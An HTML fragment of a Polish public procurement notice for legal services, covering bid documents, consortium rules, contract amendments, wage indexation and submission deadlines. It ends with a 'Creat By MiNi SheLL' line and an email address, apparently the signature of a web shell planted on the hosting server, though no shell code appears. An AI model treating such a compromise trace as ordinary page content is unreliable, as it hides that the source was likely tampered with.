potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadalwykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór wykazu stanowi Załącznik nr 4 do SWZ.<br/>wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, w tym numer prawa wykonywania zawodu, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu stanowi Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kompletna oferta musi zawierać następujące dokumenty:<br/>1)Formularz Oferty – zgodny w treści z Załącznikiem nr 1 do SWZ,<br/>2)Pełnomocnictwo, w przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty podpisuje pełnomocnik,<br/>3)Oświadczenie, o którym mowa w Rozdziale VIII pkt 1 SWZ, odpowiednio Wykonawca/ Podmiot udostępniający potencjał/każdy z Wykonawców wspólnie składających ofertę,<br/>4)Wyjaśnienia uzasadniające zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy),<br/>5)Odpowiedni dokument, o którym mowa w Rozdziale IX pkt 1 ppkt 5 SWZ (jeśli dotyczy),<br/>6)Zobowiązanie Podmiotu udostępniającego potencjał (jeśli dotyczy), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>2)Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 2 do SWZ, aktualne na dzień składania ofert, o którym mowa w Rozdziale VIII pkt 1 SWZ.<br/>3)Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4)Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej<br/>, o której mowa w pkt 1 Rozdziału VII SWZ – wymagania te muszą być spełnione łącznie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę wspólną), zastrzeżeniem, że jeden z członków konsorcjum spełnia warunek dysponowania osobami o określonych kwalifikacjach I doświadczeniu w całości zamówienia zgodnie z warunkami udziału, natomiast inny członek konsorcjum w takim wypadku spełnia w całości warunek udziału dotyczący doświadczenia Wykonawcy.<br/>5)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zmiany treści Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.Dokonanie zmiany Umowy dopuszczalne jest w następujących sytuacjach:<br/>1)zmiana sposobu spełnienia świadczenia i wysokości wynagrodzenia Wykonawcy na skutek wystąpienia jednej z poniższych okoliczności:<br/>a)zmiany przepisów prawa mających wpływ na realizację przedmiotu niniejszej Umowy oraz umów, których obsługa prawna dotyczy i mających wpływ na zakres lub termin wykonania przedmiotu Umowy,<br/>b)reorganizacji Zamawiającego skutkującego koniecznością zmiany sposobu wykonywania przedmiotu Umowy,<br/>c)zmiany w zakresie zadań lub obowiązków realizowanych przez ZARR S.A. skutkujących istotną zmianą zapotrzebowania na pomoc prawną, a w konsekwencji zmniejszeniem zakresu obowiązków Wykonawcy lub koniecznością zatrudnienia dodatkowych prawników realizujących czynności tego samego rodzaju, co wykonywane przez Wykonawcę,<br/>d)konieczność lub celowość zmiany w sposobie spełnienia świadczenia wynikająca z innych przyczyn uzasadnionych celem Umowy i jej uwarunkowaniami prawnymi lub finansowymi,<br/>e)wystąpienia siły wyższej uniemożliwiającej wykonanie Przedmiotu umowy zgodnie z jej postanowieniami; w przypadku wystąpienia siły wyższej, niezależnie od innych obowiązków umownych z tym związanych, Wykonawca który wskutek tego nie może należycie wykonać zobowiązań wynikających z Umowy, jest zobowiązany niezwłocznie zawiadomić Zamawiającego o zaistnieniu siły wyższej, jednocześnie określając jej wpływ na wykonanie swoich zobowiązań oraz przedkładając dokumenty wykazujące, że zaistniała siła wyższa uniemożliwia, czy też utrudnia wykonanie Umowy,<br/>3.	Waloryzacja wynagrodzeń. Wynagrodzenie Wykonawcy ulegnie zmianie w przypadku zmiany:<br/>1)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz.U. z 2020 r., poz. 2207),<br/>3)	zasad podleganiu ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki na ubezpieczenie społeczne lub zdrowotne,<br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2023 r. poz. 46, 1723,1941),<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>4.	Strony ustalają następujące zasady wprowadzania zmian, o których mowa w ust. 3:<br/>1)	w przypadku zmiany stawki podatku od towarów i usług (VAT) w czasie trwania Umowy, do każdej fakturowanej kwoty netto zostanie doliczony podatek VAT zgodnie z obowiązującymi przepisami. Zmiana stawki podatku od towarów i usług dotyczy prac wykonanych po dacie wejścia w życie tej zmiany. Zmiana ta nie wymaga aneksu do Umowy.<br/>2)	w przypadkach określonych w ust. 3 pkt 1 – 4 Wykonawca, w terminie nie dłuższym niż 14 dni od wejścia w życie nowych przepisów, może zwrócić się do strony przeciwnej z wnioskiem o zmianę wynagrodzenia. Wraz z wnioskiem, Wykonawca będzie zobowiązany pisemnie przedstawić stronie przeciwnej szczegółową kalkulację uzasadniającą zmianę kosztów, wynikającą ze zmiany ww. przepisów. Jeżeli do upływu 14 dni Wykonawca nie zwróci się do strony przeciwnej o zmianę wynagrodzenia, Zamawiający uzna, że zmiana przepisów nie ma wpływu na koszty wykonania Umowy przez Wykonawcę. <br/><br/>ze względu na ograniczoną liczbę znaków w polu ciąg dalszy zmian umowy w informacjach dodatkowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy za pośrednictwem platformy elektronicznej znajdującej się pod adresem https://portal.smartpzp.pl/zarr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. dot zmian umowy:<br/>3)	Zamawiający dokona analizy przedłożonej kalkulacji w terminie nie dłuższym niż 14 dni od dnia jej otrzymania. Jeżeli uzna, że przedstawiona kalkulacja potwierdza zmianę kosztów ponoszonych przez Stronę przeciwną, dokonana zostanie zmiana Umowy w tym zakresie. Jeżeli Zamawiający uzna, że przedstawiona kalkulacja nie potwierdza zmiany kosztów wykonania Umowy w wysokości zaproponowanej przez Wykonawcę, nie wyrazi zgody na wprowadzanie zmiany, o czym poinformuje Wykonawcę, przedstawiając stosowne uzasadnienie. W takiej sytuacji, w terminie 14 dni od dnia otrzymania odmowy, Wykonawca może ponownie przedstawić kalkulację uzasadniającą zmianę kosztów, z uwzględnieniem uwag Zamawiającego, który dokona jej analizy w terminie nie dłuższym niż 14 dni od jej otrzymania, a następnie postąpi w sposób opisany powyżej.<br/>4)	zmiana wynagrodzenia nastąpi od daty wprowadzenia zmian w Umowie i może dotyczyć wyłącznie niezrealizowanej części przedmiotu Umowy.<br/>5)	Ewentualna zmiana wysokości wynagrodzenia będzie następowała w oparciu o aneks do Umowy.<br/>5.	Niezależnie od postanowień ust. 3-4 Wynagrodzenie Wykonawcy może ulec zmianie na wniosek Stron Umowy w przypadku zmiany kosztów związanych z wykonaniem zamówienia. Przez zmianę kosztów rozumie się wzrost odpowiednio, jak i ich obniżenie kosztów, względem kosztów przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie. Strony ustalają następujące zasady wprowadzania zmian:<br/>1)	pierwsza waloryzacja może nastąpić nie wcześniej niż po upływie 12 miesięcy od dnia zawarcia Umowy, jeżeli łączna wartość korekt dla oddania wzrostu lub spadku cen, wynikających z waloryzacji, osiągnie limit +/- 1 % całkowitego wynagrodzenia netto, o którym mowa w § 7 ust. 1,<br/>2)	waloryzacja będzie się odbywać w oparciu o wskaźnik wzrostu lub spadku przeciętnego wynagrodzenia (w gospodarce narodowej – ogółem) opublikowany przez Prezesa Głównego Urzędu Statystycznego w Biuletynie Statystycznym GUS, ogłaszanego przez Prezesa Głównego Urzędu Statystycznego na podstawie art. 94 ust. 1 pkt 2 ustawy z dnia 17 grudnia 1998 r. o emeryturach i rentach z Funduszu Ubezpieczeń Społecznych (t.j. Dz.U. z 2021 r., poz. 291);<br/>3)	występując o wynagrodzenie, Wykonawca jest zobowiązany do uwzględnienia waloryzacji w oparciu o wartości wynikające z ostatnich dostępnych danych opublikowanych przez Prezesa Głównego Urzędu Statystycznego; zamawiający dokona wypłaty wynagrodzenia w oparciu o tak ustaloną wartość,<br/>4)	w przypadku, gdyby wskaźnik, o którym mowa w pkt 2, przestał być dostępny, zastosowanie znajdą inne, najbardziej zbliżone, wskaźniki publikowane przez Prezesa Głównego Urzędu Statystycznego;<br/>5)	łączna wartość korekt wynikająca z waloryzacji nie przekroczy (+/-) 10 % ceny ofertowej Wykonawcy netto określonej przez Wykonawcę w ofercie; waloryzacja dokonana na podstawie postanowień niniejszego paragrafu może zwiększyć/zmniejszyć wartość całkowitego wynagrodzenia, o którym mowa w § 7 ust. 1 maksymalnie o 10 % ceny ofertowej Wykonawcy netto;<br/>6)	wykonawca, którego wynagrodzenie zostało zmienione zgodnie z postanowieniami niniejszego paragrafu, zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie w jakim świadczy on obsługę prawną Zamawiającego, jeżeli okres obowiązywania tej umowy przekracza 12 miesięcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com